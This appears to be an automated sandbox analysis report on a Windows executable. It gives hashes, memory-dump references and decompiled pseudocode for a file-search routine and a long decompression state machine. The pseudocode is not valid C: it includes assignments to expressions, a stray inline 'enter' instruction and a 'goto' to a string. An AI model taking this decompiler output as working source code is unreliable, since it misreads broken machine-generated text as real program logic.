                                                                                        • API String ID: 123533781-1104044542
                                                                                        • Opcode ID: 0717a7709797340a5743797a86df642296be39c6595760980035c57ed759ee55
                                                                                        • Instruction ID: b205fa0f6c371e5dc37930ac793058e6edb3c03a2887874d4a759486fbbeee3c
                                                                                        • Opcode Fuzzy Hash: 0717a7709797340a5743797a86df642296be39c6595760980035c57ed759ee55
                                                                                        • Instruction Fuzzy Hash: F5511671A00208AFCB50DFE4CA88E9D7BB6EF48314F2041BAF515EB2D1DA799981CB14
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 39%
                                                                                        			E004027A1(char __ebx, char* __edi, char* __esi) {
                                                                                        				void* _t19;
                                                                                        
                                                                                        				if(FindFirstFileA(E00402BCE(2), _t19 - 0x1d0) != 0xffffffff) {
                                                                                        					E004061AB(__edi, _t6);
                                                                                        					_push(_t19 - 0x1a4);
                                                                                        					_push(__esi);
                                                                                        					E0040624D();
                                                                                        				} else {
                                                                                        					 *__edi = __ebx;
                                                                                        					 *__esi = __ebx;
                                                                                        					 *((intOrPtr*)(_t19 - 4)) = 1;
                                                                                        				}
                                                                                        				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t19 - 4));
                                                                                        				return 0;
                                                                                        			}





                                                                                        APIs
                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: FileFindFirst
                                                                                        • String ID:
                                                                                        • API String ID: 1974802433-0
                                                                                        • Opcode ID: 54e83448eb3b122805b370520c8f42e6cd15468a3f63d6e007e8d611046ccabe
                                                                                        • Instruction ID: 52cf83cb61f6f27ed997ed7cc61b6938fc353794e3a771b70e6184720e28d6c0
                                                                                        • Opcode Fuzzy Hash: 54e83448eb3b122805b370520c8f42e6cd15468a3f63d6e007e8d611046ccabe
                                                                                        • Instruction Fuzzy Hash: B3F0A771604110DFD710EB649A49AEE77689F51314F6005BFF102F21C1D6B849469B3A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 79%
                                                                                        			E00406A9B(signed int __ebx, signed int* __esi) {
                                                                                        				signed int _t367;
                                                                                        				signed int _t396;
                                                                                        				signed int _t413;
                                                                                        				signed int _t414;
                                                                                        				signed int* _t417;
                                                                                        				void* _t419;
                                                                                        
                                                                                        				L0:
                                                                                        				while(1) {
                                                                                        					L0:
                                                                                        					_t417 = __esi;
                                                                                        					_t396 = __ebx;
                                                                                        					if( *(_t419 - 0x34) == 0) {
                                                                                        						break;
                                                                                        					}
                                                                                        					L55:
                                                                                        					__eax =  *(__ebp - 0x38);
                                                                                        					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                        					__ecx = __ebx;
                                                                                        					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                        					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                        					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                        					__ebx = __ebx + 8;
                                                                                        					while(1) {
                                                                                        						L56:
                                                                                        						if(__ebx < 0xe) {
                                                                                        							goto L0;
                                                                                        						}
                                                                                        						L57:
                                                                                        						__eax =  *(__ebp - 0x40);
                                                                                        						__eax =  *(__ebp - 0x40) & 0x00003fff;
                                                                                        						__ecx = __eax;
                                                                                        						__esi[1] = __eax;
                                                                                        						__ecx = __eax & 0x0000001f;
                                                                                        						if(__cl > 0x1d) {
                                                                                        							L9:
                                                                                        							_t414 = _t413 | 0xffffffff;
                                                                                        							 *_t417 = 0x11;
                                                                                        							L10:
                                                                                        							_t417[0x147] =  *(_t419 - 0x40);
                                                                                        							_t417[0x146] = _t396;
                                                                                        							( *(_t419 + 8))[1] =  *(_t419 - 0x34);
                                                                                        							L11:
                                                                                        							 *( *(_t419 + 8)) =  *(_t419 - 0x38);
                                                                                        							_t417[0x26ea] =  *(_t419 - 0x30);
                                                                                        							E0040720A( *(_t419 + 8));
                                                                                        							return _t414;
                                                                                        						}
                                                                                        						L58:
                                                                                        						__eax = __eax & 0x000003e0;
                                                                                        						if(__eax > 0x3a0) {
                                                                                        							goto L9;
                                                                                        						}
                                                                                        						L59:
                                                                                        						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                                                                                        						__ebx = __ebx - 0xe;
                                                                                        						_t94 =  &(__esi[2]);
                                                                                        						 *_t94 = __esi[2] & 0x00000000;
                                                                                        						 *__esi = 0xc;
                                                                                        						while(1) {
                                                                                        							L60:
                                                                                        							__esi[1] = __esi[1] >> 0xa;
                                                                                        							__eax = (__esi[1] >> 0xa) + 4;
                                                                                        							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                                                        								goto L68;
                                                                                        							}
                                                                                        							L61:
                                                                                        							while(1) {
                                                                                        								L64:
                                                                                        								if(__ebx >= 3) {
                                                                                        									break;
                                                                                        								}
                                                                                        								L62:
                                                                                        								if( *(__ebp - 0x34) == 0) {
                                                                                        									goto L159;
                                                                                        								}
                                                                                        								L63:
                                                                                        								__eax =  *(__ebp - 0x38);
                                                                                        								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                        								__ecx = __ebx;
                                                                                        								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                        								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                        								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                        								__ebx = __ebx + 8;
                                                                                        							}
                                                                                        							L65:
                                                                                        							__ecx = __esi[2];
                                                                                        							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                                                                                        							__ebx = __ebx - 3;
                                                                                        							_t108 = __ecx + 0x408408; // 0x121110
                                                                                        							__ecx =  *_t108;
                                                                                        							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                                                                                        							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                                                                                        							__ecx = __esi[1];
                                                                                        							__esi[2] = __esi[2] + 1;
                                                                                        							__eax = __esi[2];
                                                                                        							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                                                                                        							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                                                                                        								goto L64;
                                                                                        							}
                                                                                        							L66:
                                                                                        							while(1) {
                                                                                        								L68:
                                                                                        								if(__esi[2] >= 0x13) {
                                                                                        									break;
                                                                                        								}
                                                                                        								L67:
                                                                                        								_t119 = __esi[2] + 0x408408; // 0x4000300
                                                                                        								__eax =  *_t119;
                                                                                        								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                                                                                        								_t126 =  &(__esi[2]);
                                                                                        								 *_t126 = __esi[2] + 1;
                                                                                        							}
                                                                                        							L69:
                                                                                        							__ecx = __ebp - 8;
                                                                                        							__edi =  &(__esi[0x143]);
                                                                                        							 &(__esi[0x148]) =  &(__esi[0x144]);
                                                                                        							__eax = 0;
                                                                                        							 *(__ebp - 8) = 0;
                                                                                        							__eax =  &(__esi[3]);
                                                                                        							 *__edi = 7;
                                                                                        							__eax = E00407272( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                                                                                        							if(__eax != 0) {
                                                                                        								L72:
                                                                                        								 *__esi = 0x11;
                                                                                        								while(1) {
                                                                                        									L157:
                                                                                        									_t367 =  *_t417;
                                                                                        									if(_t367 > 0xf) {
                                                                                        										break;
                                                                                        									}
                                                                                        									L1:
                                                                                        									switch( *((intOrPtr*)(_t367 * 4 +  &M004071CA))) {
                                                                                        										case 0:
                                                                                        											L101:
                                                                                        											__eax = __esi[4] & 0x000000ff;
                                                                                        											__esi[3] = __esi[4] & 0x000000ff;
                                                                                        											__eax = __esi[5];
                                                                                        											__esi[2] = __esi[5];
                                                                                        											 *__esi = 1;
                                                                                        											goto L102;
                                                                                        										case 1:
                                                                                        											L102:
                                                                                        											__eax = __esi[3];
                                                                                        											while(1) {
                                                                                        												L105:
                                                                                        												__eflags = __ebx - __eax;
                                                                                        												if(__ebx >= __eax) {
                                                                                        													break;
                                                                                        												}
                                                                                        												L103:
                                                                                        												__eflags =  *(__ebp - 0x34);
                                                                                        												if( *(__ebp - 0x34) == 0) {
                                                                                        													goto L159;
                                                                                        												}
                                                                                        												L104:
                                                                                        												__ecx =  *(__ebp - 0x38);
                                                                                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                        												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                        												__ecx = __ebx;
                                                                                        												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                        												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                        												__ebx = __ebx + 8;
                                                                                        												__eflags = __ebx;
                                                                                        											}
                                                                                        											L106:
                                                                                        											__eax =  *(0x40a420 + __eax * 2) & 0x0000ffff;
                                                                                        											__eax = __eax &  *(__ebp - 0x40);
                                                                                        											__ecx = __esi[2];
                                                                                        											__eax = __esi[2] + __eax * 4;
                                                                                        											__ecx =  *(__eax + 1) & 0x000000ff;
                                                                                        											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                        											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                                                        											__ecx =  *__eax & 0x000000ff;
                                                                                        											__eflags = __ecx;
                                                                                        											if(__ecx != 0) {
                                                                                        												L108:
                                                                                        												__eflags = __cl & 0x00000010;
                                                                                        												if((__cl & 0x00000010) == 0) {
                                                                                        													L110:
                                                                                        													__eflags = __cl & 0x00000040;
                                                                                        													if((__cl & 0x00000040) == 0) {
                                                                                        														goto L125;
                                                                                        													}
                                                                                        													L111:
                                                                                        													__eflags = __cl & 0x00000020;
                                                                                        													if((__cl & 0x00000020) == 0) {
                                                                                        														goto L9;
                                                                                        													}
                                                                                        													L112:
                                                                                        													 *__esi = 7;
                                                                                        													goto L157;
                                                                                        												}
                                                                                        												L109:
                                                                                        												__esi[2] = __ecx;
                                                                                        												__esi[1] = __eax;
                                                                                        												 *__esi = 2;
                                                                                        												goto L157;
                                                                                        											}
                                                                                        											L107:
                                                                                        											__esi[2] = __eax;
                                                                                        											 *__esi = 6;
                                                                                        											goto L157;
                                                                                        										case 2:
                                                                                        											L113:
                                                                                        											__eax = __esi[2];
                                                                                        											while(1) {
                                                                                        												L116:
                                                                                        												__eflags = __ebx - __eax;
                                                                                        												if(__ebx >= __eax) {
                                                                                        													break;
                                                                                        												}
                                                                                        												L114:
                                                                                        												__eflags =  *(__ebp - 0x34);
                                                                                        												if( *(__ebp - 0x34) == 0) {
                                                                                        													goto L159;
                                                                                        												}
                                                                                        												L115:
                                                                                        												__ecx =  *(__ebp - 0x38);
                                                                                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                        												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                        												__ecx = __ebx;
                                                                                        												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                        												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                        												__ebx = __ebx + 8;
                                                                                        												__eflags = __ebx;
                                                                                        											}
                                                                                        											L117:
                                                                                        											 *(0x40a420 + __eax * 2) & 0x0000ffff =  *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                        											__esi[1] = __esi[1] + ( *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                        											__ecx = __eax;
                                                                                        											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                        											__ebx = __ebx - __eax;
                                                                                        											__eflags = __ebx;
                                                                                        											__eax = __esi[4] & 0x000000ff;
                                                                                        											__esi[3] = __esi[4] & 0x000000ff;
                                                                                        											__eax = __esi[6];
                                                                                        											__esi[2] = __esi[6];
                                                                                        											 *__esi = 3;
                                                                                        											goto L118;
                                                                                        										case 3:
                                                                                        											L118:
                                                                                        											__eax = __esi[3];
                                                                                        											while(1) {
                                                                                        												L121:
                                                                                        												__eflags = __ebx - __eax;
                                                                                        												if(__ebx >= __eax) {
                                                                                        													break;
                                                                                        												}
                                                                                        												L119:
                                                                                        												__eflags =  *(__ebp - 0x34);
                                                                                        												if( *(__ebp - 0x34) == 0) {
                                                                                        													goto L159;
                                                                                        												}
                                                                                        												L120:
                                                                                        												__ecx =  *(__ebp - 0x38);
                                                                                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                        												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                        												__ecx = __ebx;
                                                                                        												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                        												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                        												__ebx = __ebx + 8;
                                                                                        												__eflags = __ebx;
                                                                                        											}
                                                                                        											L122:
                                                                                        											__eax =  *(0x40a420 + __eax * 2) & 0x0000ffff;
                                                                                        											__eax = __eax &  *(__ebp - 0x40);
                                                                                        											__ecx = __esi[2];
                                                                                        											__eax = __esi[2] + __eax * 4;
                                                                                        											__ecx =  *(__eax + 1) & 0x000000ff;
                                                                                        											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                        											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                                                        											__ecx =  *__eax & 0x000000ff;
                                                                                        											__eflags = __cl & 0x00000010;
                                                                                        											if((__cl & 0x00000010) == 0) {
                                                                                        												L124:
                                                                                        												__eflags = __cl & 0x00000040;
                                                                                        												if((__cl & 0x00000040) != 0) {
                                                                                        													goto L9;
                                                                                        												}
                                                                                        												L125:
                                                                                        												__esi[3] = __ecx;
                                                                                        												__ecx =  *(__eax + 2) & 0x0000ffff;
                                                                                        												__esi[2] = __eax;
                                                                                        												goto L157;
                                                                                        											}
                                                                                        											L123:
                                                                                        											__esi[2] = __ecx;
                                                                                        											__esi[3] = __eax;
                                                                                        											 *__esi = 4;
                                                                                        											goto L157;
                                                                                        										case 4:
                                                                                        											L126:
                                                                                        											__eax = __esi[2];
                                                                                        											while(1) {
                                                                                        												L129:
                                                                                        												__eflags = __ebx - __eax;
                                                                                        												if(__ebx >= __eax) {
                                                                                        													break;
                                                                                        												}
                                                                                        												L127:
                                                                                        												__eflags =  *(__ebp - 0x34);
                                                                                        												if( *(__ebp - 0x34) == 0) {
                                                                                        													goto L159;
                                                                                        												}
                                                                                        												L128:
                                                                                        												__ecx =  *(__ebp - 0x38);
                                                                                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                        												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                        												__ecx = __ebx;
                                                                                        												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                        												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                        												__ebx = __ebx + 8;
                                                                                        												__eflags = __ebx;
                                                                                        											}
                                                                                        											L130:
                                                                                        											 *(0x40a420 + __eax * 2) & 0x0000ffff =  *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                        											__esi[3] = __esi[3] + ( *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                        											__ecx = __eax;
                                                                                        											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                        											__eflags = __ebx;
                                                                                        											 *__esi = 5;
                                                                                        											goto L131;
                                                                                        										case 5:
                                                                                        											L131:
                                                                                        											__eax =  *(__ebp - 0x30);
                                                                                        											__edx = __esi[3];
                                                                                        											_push(__esi);
                                                                                        											__al = __al | 0x0000008b;
                                                                                        											asm("enter 0xce2b, 0x81");
                                                                                        											goto ("bleWindow");
                                                                                        										case 6:
                                                                                        											L133:
                                                                                        											__eax =  *(__ebp - 0x2c);
                                                                                        											__edi =  *(__ebp - 0x30);
                                                                                        											__eflags = __eax;
                                                                                        											if(__eax != 0) {
                                                                                        												L149:
                                                                                        												__cl = __esi[2];
                                                                                        												 *__edi = __cl;
                                                                                        												__edi = __edi + 1;
                                                                                        												__eax = __eax - 1;
                                                                                        												 *(__ebp - 0x30) = __edi;
                                                                                        												 *(__ebp - 0x2c) = __eax;
                                                                                        												goto L23;
                                                                                        											}
                                                                                        											L134:
                                                                                        											__ecx = __esi[0x26e8];
                                                                                        											__eflags = __edi - __ecx;
                                                                                        											if(__edi != __ecx) {
                                                                                        												L140:
                                                                                        												__esi[0x26ea] = __edi;
                                                                                        												__eax = E0040720A( *((intOrPtr*)(__ebp + 8)));
                                                                                        												__edi = __esi[0x26ea];
                                                                                        												__ecx = __esi[0x26e9];
                                                                                        												__eflags = __edi - __ecx;
                                                                                        												 *(__ebp - 0x30) = __edi;
                                                                                        												if(__edi >= __ecx) {
                                                                                        													__eax = __esi[0x26e8];
                                                                                        													__eax = __esi[0x26e8] - __edi;
                                                                                        													__eflags = __eax;
                                                                                        												} else {
                                                                                        													__ecx = __ecx - __edi;
                                                                                        													__eax = __ecx - __edi - 1;
                                                                                        												}
                                                                                        												__edx = __esi[0x26e8];
                                                                                        												__eflags = __edi - __edx;
                                                                                        												 *(__ebp - 8) = __edx;
                                                                                        												if(__edi == __edx) {
                                                                                        													__edx =  &(__esi[0x6e8]);
                                                                                        													__eflags = __ecx - __edx;
                                                                                        													if(__ecx != __edx) {
                                                                                        														__edi = __edx;
                                                                                        														__eflags = __edi - __ecx;
                                                                                        														 *(__ebp - 0x30) = __edi;
                                                                                        														if(__edi >= __ecx) {
                                                                                        															__eax =  *(__ebp - 8);
                                                                                        															__eax =  *(__ebp - 8) - __edi;
                                                                                        															__eflags = __eax;
                                                                                        														} else {
                                                                                        															__ecx = __ecx - __edi;
                                                                                        															__eax = __ecx;
                                                                                        														}
                                                                                        													}
                                                                                        												}
                                                                                        												__eflags = __eax;
                                                                                        												if(__eax == 0) {
                                                                                        													goto L160;
                                                                                        												} else {
                                                                                        													goto L149;
                                                                                        												}
                                                                                        											}
                                                                                        											L135:
                                                                                        											__eax = __esi[0x26e9];
                                                                                        											__edx =  &(__esi[0x6e8]);
                                                                                        											__eflags = __eax - __edx;
                                                                                        											if(__eax == __edx) {
                                                                                        												goto L140;
                                                                                        											}
                                                                                        											L136:
                                                                                        											__edi = __edx;
                                                                                        											__eflags = __edi - __eax;
                                                                                        											if(__edi >= __eax) {
                                                                                        												__ecx = __ecx - __edi;
                                                                                        												__eflags = __ecx;
                                                                                        												__eax = __ecx;
                                                                                        											} else {
                                                                                        												__eax = __eax - __edi;
                                                                                        												__eax = __eax - 1;
                                                                                        											}
                                                                                        											__eflags = __eax;
                                                                                        											if(__eax != 0) {
                                                                                        												goto L149;
                                                                                        											} else {
                                                                                        												goto L140;
                                                                                        											}
                                                                                        										case 7:
                                                                                        											L150:
                                                                                        											__eflags = __ebx - 7;
                                                                                        											if(__ebx > 7) {
                                                                                        												__ebx = __ebx - 8;
                                                                                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
                                                                                        												_t351 = __ebp - 0x38;
                                                                                        												 *_t351 =  *(__ebp - 0x38) - 1;
                                                                                        												__eflags =  *_t351;
                                                                                        											}
                                                                                        											goto L152;
                                                                                        										case 8:
                                                                                        											L4:
                                                                                        											while(_t396 < 3) {
                                                                                        												if( *(_t419 - 0x34) == 0) {
                                                                                        													goto L159;
                                                                                        												} else {
                                                                                        													 *(_t419 - 0x34) =  *(_t419 - 0x34) - 1;
                                                                                        													 *(_t419 - 0x40) =  *(_t419 - 0x40) | ( *( *(_t419 - 0x38)) & 0x000000ff) << _t396;
                                                                                        													 *(_t419 - 0x38) =  &(( *(_t419 - 0x38))[1]);
                                                                                        													_t396 = _t396 + 8;
                                                                                        													continue;
                                                                                        												}
                                                                                        											}
                                                                                        											_t396 = _t396 - 3;
                                                                                        											 *(_t419 - 0x40) =  *(_t419 - 0x40) >> 3;
                                                                                        											_t377 =  *(_t419 - 0x40) & 0x00000007;
                                                                                        											asm("sbb ecx, ecx");
                                                                                        											_t379 = _t377 >> 1;
                                                                                        											_t417[0x145] = ( ~(_t377 & 0x00000001) & 0x00000007) + 8;
                                                                                        											if(_t379 == 0) {
                                                                                        												L24:
                                                                                        												 *_t417 = 9;
                                                                                        												_t407 = _t396 & 0x00000007;
                                                                                        												 *(_t419 - 0x40) =  *(_t419 - 0x40) >> _t407;
                                                                                        												_t396 = _t396 - _t407;
                                                                                        												goto L157;
                                                                                        											}
                                                                                        											L6:
                                                                                        											_t382 = _t379 - 1;
                                                                                        											if(_t382 == 0) {
                                                                                        												L13:
                                                                                        												__eflags =  *0x42e3d0;
                                                                                        												if( *0x42e3d0 != 0) {
                                                                                        													L22:
                                                                                        													_t383 =  *0x40a444; // 0x9
                                                                                        													_t417[4] = _t383;
                                                                                        													_t384 =  *0x40a448; // 0x5
                                                                                        													_t417[4] = _t384;
                                                                                        													_t385 =  *0x42d24c; // 0x0
                                                                                        													_t417[5] = _t385;
                                                                                        													_t386 =  *0x42d248; // 0x0
                                                                                        													_t417[6] = _t386;
                                                                                        													L23:
                                                                                        													 *_t417 =  *_t417 & 0x00000000;
                                                                                        													goto L157;
                                                                                        												} else {
                                                                                        													_t26 = _t419 - 8;
                                                                                        													 *_t26 =  *(_t419 - 8) & 0x00000000;
                                                                                        													__eflags =  *_t26;
                                                                                        													_t387 = 0x42d250;
                                                                                        													do {
                                                                                        														L15:
                                                                                        														__eflags = _t387 - 0x42d48c;
                                                                                        														_t409 = 8;
                                                                                        														if(_t387 > 0x42d48c) {
                                                                                        															__eflags = _t387 - 0x42d650;
                                                                                        															if(_t387 >= 0x42d650) {
                                                                                        																__eflags = _t387 - 0x42d6b0;
                                                                                        																if(_t387 < 0x42d6b0) {
                                                                                        																	_t409 = 7;
                                                                                        																}
                                                                                        															} else {
                                                                                        																_t409 = 9;
                                                                                        															}
                                                                                        														}
                                                                                        														L20:
                                                                                        														 *_t387 = _t409;
                                                                                        														_t387 = _t387 + 4;
                                                                                        														__eflags = _t387 - 0x42d6d0;
                                                                                        													} while (_t387 < 0x42d6d0);
                                                                                        													E00407272(0x42d250, 0x120, 0x101, 0x40841c, 0x40845c, 0x42d24c, 0x40a444, 0x42db50, _t419 - 8);
                                                                                        													_push(0x1e);
                                                                                        													_pop(_t411);
                                                                                        													_push(5);
                                                                                        													_pop(_t390);
                                                                                        													memset(0x42d250, _t390, _t411 << 2);
                                                                                        													_t421 = _t421 + 0xc;
                                                                                        													_t413 = 0x42d250 + _t411;
                                                                                        													E00407272(0x42d250, 0x1e, 0, 0x40849c, 0x4084d8, 0x42d248, 0x40a448, 0x42db50, _t419 - 8);
                                                                                        													 *0x42e3d0 =  *0x42e3d0 + 1;
                                                                                        													__eflags =  *0x42e3d0;
                                                                                        													goto L22;
                                                                                        												}
                                                                                        											}
                                                                                        											L7:
                                                                                        											_t394 = _t382 - 1;
                                                                                        											if(_t394 == 0) {
                                                                                        												 *_t417 = 0xb;
                                                                                        												goto L157;
                                                                                        											}
                                                                                        											L8:
                                                                                        											if(_t394 != 1) {
                                                                                        												goto L157;
                                                                                        											}
                                                                                        											goto L9;
                                                                                        										case 9:
                                                                                        											while(1) {
                                                                                        												L27:
                                                                                        												__eflags = __ebx - 0x20;
                                                                                        												if(__ebx >= 0x20) {
                                                                                        													break;
                                                                                        												}
                                                                                        												L25:
                                                                                        												__eflags =  *(__ebp - 0x34);
                                                                                        												if( *(__ebp - 0x34) == 0) {
                                                                                        													goto L159;
                                                                                        												}
                                                                                        												L26:
                                                                                        												__eax =  *(__ebp - 0x38);
                                                                                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                        												__ecx = __ebx;
                                                                                        												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                        												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                        												__ebx = __ebx + 8;
                                                                                        												__eflags = __ebx;
                                                                                        											}
                                                                                        											L28:
                                                                                        											__eax =  *(__ebp - 0x40);
                                                                                        											__ebx = 0;
                                                                                        											__eax =  *(__ebp - 0x40) & 0x0000ffff;
                                                                                        											 *(__ebp - 0x40) = 0;
                                                                                        											__eflags = __eax;
                                                                                        											__esi[1] = __eax;
                                                                                        											if(__eax == 0) {
                                                                                        												goto L53;
                                                                                        											}
                                                                                        											L29:
                                                                                        											_push(0xa);
                                                                                        											_pop(__eax);
                                                                                        											goto L54;
                                                                                        										case 0xa:
                                                                                        											L30:
                                                                                        											__eflags =  *(__ebp - 0x34);
                                                                                        											if( *(__ebp - 0x34) == 0) {
                                                                                        												goto L159;
                                                                                        											}
                                                                                        											L31:
                                                                                        											__eax =  *(__ebp - 0x2c);
                                                                                        											__eflags = __eax;
                                                                                        											if(__eax != 0) {
                                                                                        												L48:
                                                                                        												__eflags = __eax -  *(__ebp - 0x34);
                                                                                        												if(__eax >=  *(__ebp - 0x34)) {
                                                                                        													__eax =  *(__ebp - 0x34);
                                                                                        												}
                                                                                        												__ecx = __esi[1];
                                                                                        												__eflags = __ecx - __eax;
                                                                                        												__edi = __ecx;
                                                                                        												if(__ecx >= __eax) {
                                                                                        													__edi = __eax;
                                                                                        												}
                                                                                        												__eax = E00405DA1( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
                                                                                        												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
                                                                                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
                                                                                        												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
                                                                                        												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
                                                                                        												_t80 =  &(__esi[1]);
                                                                                        												 *_t80 = __esi[1] - __edi;
                                                                                        												__eflags =  *_t80;
                                                                                        												if( *_t80 == 0) {
                                                                                        													L53:
                                                                                        													__eax = __esi[0x145];
                                                                                        													L54:
                                                                                        													 *__esi = __eax;
                                                                                        												}
                                                                                        												goto L157;
                                                                                        											}
                                                                                        											L32:
                                                                                        											__ecx = __esi[0x26e8];
                                                                                        											__edx =  *(__ebp - 0x30);
                                                                                        											__eflags = __edx - __ecx;
                                                                                        											if(__edx != __ecx) {
                                                                                        												L38:
                                                                                        												__esi[0x26ea] = __edx;
                                                                                        												__eax = E0040720A( *((intOrPtr*)(__ebp + 8)));
                                                                                        												__edx = __esi[0x26ea];
                                                                                        												__ecx = __esi[0x26e9];
                                                                                        												__eflags = __edx - __ecx;
                                                                                        												 *(__ebp - 0x30) = __edx;
                                                                                        												if(__edx >= __ecx) {
                                                                                        													__eax = __esi[0x26e8];
                                                                                        													__eax = __esi[0x26e8] - __edx;
                                                                                        													__eflags = __eax;
                                                                                        												} else {
                                                                                        													__ecx = __ecx - __edx;
                                                                                        													__eax = __ecx - __edx - 1;
                                                                                        												}
                                                                                        												__edi = __esi[0x26e8];
                                                                                        												 *(__ebp - 0x2c) = __eax;
                                                                                        												__eflags = __edx - __edi;
                                                                                        												if(__edx == __edi) {
                                                                                        													__edx =  &(__esi[0x6e8]);
                                                                                        													__eflags = __edx - __ecx;
                                                                                        													if(__eflags != 0) {
                                                                                        														 *(__ebp - 0x30) = __edx;
                                                                                        														if(__eflags >= 0) {
                                                                                        															__edi = __edi - __edx;
                                                                                        															__eflags = __edi;
                                                                                        															__eax = __edi;
                                                                                        														} else {
                                                                                        															__ecx = __ecx - __edx;
                                                                                        															__eax = __ecx;
                                                                                        														}
                                                                                        														 *(__ebp - 0x2c) = __eax;
                                                                                        													}
                                                                                        												}
                                                                                        												__eflags = __eax;
                                                                                        												if(__eax == 0) {
                                                                                        													goto L160;
                                                                                        												} else {
                                                                                        													goto L48;
                                                                                        												}
                                                                                        											}
                                                                                        											L33:
                                                                                        											__eax = __esi[0x26e9];
                                                                                        											__edi =  &(__esi[0x6e8]);
                                                                                        											__eflags = __eax - __edi;
                                                                                        											if(__eax == __edi) {
                                                                                        												goto L38;
                                                                                        											}
                                                                                        											L34:
                                                                                        											__edx = __edi;
